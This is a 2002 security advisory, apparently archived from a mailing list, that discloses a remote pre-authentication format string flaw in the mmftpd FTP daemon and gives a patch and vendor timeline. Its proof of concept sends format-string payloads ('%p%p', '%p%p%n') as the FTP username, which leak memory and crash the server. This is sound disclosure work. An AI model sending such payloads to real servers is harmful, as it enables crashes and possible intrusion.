OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Benoît Roussel (benoit.rousselintexxia.com)
Date: Wed Jun 12 2002 - 07:58:37 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    ________________________________________________________________________
    SECURITY ADVISORY INTEXXIA(c)
    04 06 2002 ID #1053-040602
    ________________________________________________________________________
    TITLE : mmftpd FTP Daemon Format String Vulnerability
    CREDITS : Guillaume Pelat / INTEXXIA
    ________________________________________________________________________

    SYSTEM AFFECTED
    ===============

            mmftpd <= 0.0.7

    ________________________________________________________________________

    DESCRIPTION
    ===========

            "mmftpd is a secure FTP server that runs as a normal user, and
    supports virtual users only. Each user may have specific permissions,
    including the maximum home directory size limit and download/upload
    speeds. It runs on both BSD and Linux systems, and is ideal for a setup
    with many Web virtual host customers. It was written from scratch, with
    no borrowed code."

            The Laboratory intexxia found a remotely exploitable format
    string vulnerability in the mmftpd FTP deamon .

    ________________________________________________________________________

    DETAILS
    =======

            There is a format string vulnerability in the 'mmsyslog()'
    function of the 'mmftpd ' program. This function acts like 'vsyslog()'
    if '__GLIBC__' is defined. It calls the 'syslog(3)' function with a
    format string that can be defined by a remote user. It is not necessary
    to authenticate to exploit this vulnerability.

    Successful exploitation of this flaw can allow a remote user to obtain
    a local account on the target machine.

    ________________________________________________________________________

    PROOF OF CONCEPT
    ================

    test:~$ telnet test.lab.intexxia.com 21
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
    USER %p%p
    331 Password required for this user
    PASS foo
    530 Invalid login

    In the log file :
    mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)

    test:~$ telnet test.lab.intexxia.com 21
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
    USER %p%p%n
    331 Password required for this user
    PASS foo
    Connection closed by foreign host.

    test:~$ telnet test.lab.intexxia.com 21
    Trying x.x.x.x...
    telnet: Unable to connect to remote host: Connection refused

    ________________________________________________________________________

    SOLUTION
    ========

    The following patch corrects this issue :

    diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
    - --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
    +++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun 4 11:25:03 2002
    -70,7 +70,7
      va_start(lst, fmt);
      vsnprintf(buf, 1023, fmt, lst);
      va_end(lst);
    - - syslog(LOG_NOTICE, buf);
    + syslog(LOG_NOTICE, "%s", buf);
         }
     }

    A new version including this patch is available at the following URL :
    http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz

    ________________________________________________________________________

    VENDOR STATUS
    =============

            04-06-2002 : This bulletin was sent to Matthew Mondor.
            05-06-2002 : Matthew was very reactive and confirmed the
                         vulnerability. He released a new version.

    ________________________________________________________________________

    LEGALS
    ======

            mmftpd is registered trademark.

            Intexxia provides this information as a public service and "as
    is". Intexxia will not be held accountable for any damage or distress
    caused by the proper or improper usage of these materials.

            (c) intexxia 2002. This document is property of intexxia. Feel
    free to use and distribute this material as long as credit is given to
    intexxia and the author.

    ________________________________________________________________________

    CONTACT
    =======

    CERT intexxia certintexxia.com
    INTEXXIA http://www.intexxia.com
    171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
    92024 Nanterre Cedex - France Fax : +33 1 55 69 78 80

    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

    iQA/AwUBPQdFek2N8BNyNDXLEQKEpACgt/bLhZ6ahg8ryeQZySgsAwfgrN0AoN1t
    +RZxkiJQjPqx2M/035bKlMSq
    =pRJF
    -----END PGP SIGNATURE-----